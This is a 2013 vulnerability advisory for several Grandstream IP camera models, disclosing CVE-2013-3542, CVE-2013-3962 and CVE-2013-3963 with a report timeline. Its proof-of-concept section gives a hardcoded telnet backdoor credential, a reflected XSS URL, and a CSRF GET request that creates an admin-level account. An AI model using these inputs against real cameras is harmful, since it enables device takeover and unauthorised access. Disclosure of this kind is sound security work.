Grandstream Backdoor / Cross Site Request Forgery / Cross Site Scripting

`===============================================================================  
GRANDSTREAM  
====================================================================  
===============================================================================  
  
1.Advisory Information  
Title: Grandstream Series Vulnerabilities  
Date Published: 12/06/2013  
Date of last updated: 12/06/2013  
  
2.Vulnerability Description  
The following vulnerability has been found in these devices:  
-CVE-2013-3542. Backdoor in Telnet Protocol(CAPEC-443)  
-CVE-2013-3962. Cross Site Scripting(CWE-79)  
-CVE-2013-3963. Cross Site Request Forgery(CWE-352) and Clickjacking(Capec-103)  
  
3.Affected Products  
The following product are affected: GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD and GXV3500.  
-CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963.  
It’s possible others models are affected but they were not checked.  
  
4.PoC  
4.1.Backdoor in Telnet Protocol  
CVE-2013-3542, Backdoor in Telnet Protocol  
You should connect via telnet protocol to any camera affected (it's open by default).  
After all you should be introduce the magic string “ !#/ ” as Username and as Password.  
You will get the admin panel setting menu. If you type "help", the following commands are shown:  
=======================================================  
help, quit, status, restart, restore, upgrade, tty_test  
=======================================================  
@@@ restore (Reset settings to factory default)  
  
The attacker can take the device control, so it's make this devices very vulnerables.  
  
4.2.Cross Site Scripting (XSS)  
CVE-2013-3962, Cross Site Scripting non-persistent.  
_____________________________________________________________________________  
http://xx.xx.xx.xx/<script>alert(123)</script>  
_____________________________________________________________________________  
  
4.3.Cross Site Request Forgery (CSRF)  
CVE-2013-3963, CSRF via GET method.  
These cameras use a web interface which is prone to CSRF vulnerabilities.   
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters.  
You should introduce the following URL to replicate the attack.  
_____________________________________________________________________________  
http://xx.xx.xx.xx/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0  
_____________________________________________________________________________  
  
5.Credits  
-CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963 were discovered by Jonás Ropero Castillo.  
  
6.Report Timeline  
-2013-05-31: Students opens a ticket in order to notify the Grandstream Customer Support of the CVE-2013-3542.   
-2013-05-31: Grandstream team reports to the technical support to analyze the vulnerability.  
-2013-06-11: Students opens a ticket in order to notify the Grandstream Customer Support of the CVE-2013-3962 and CVE-2013-3963 vulnerabilities.   
  
  
`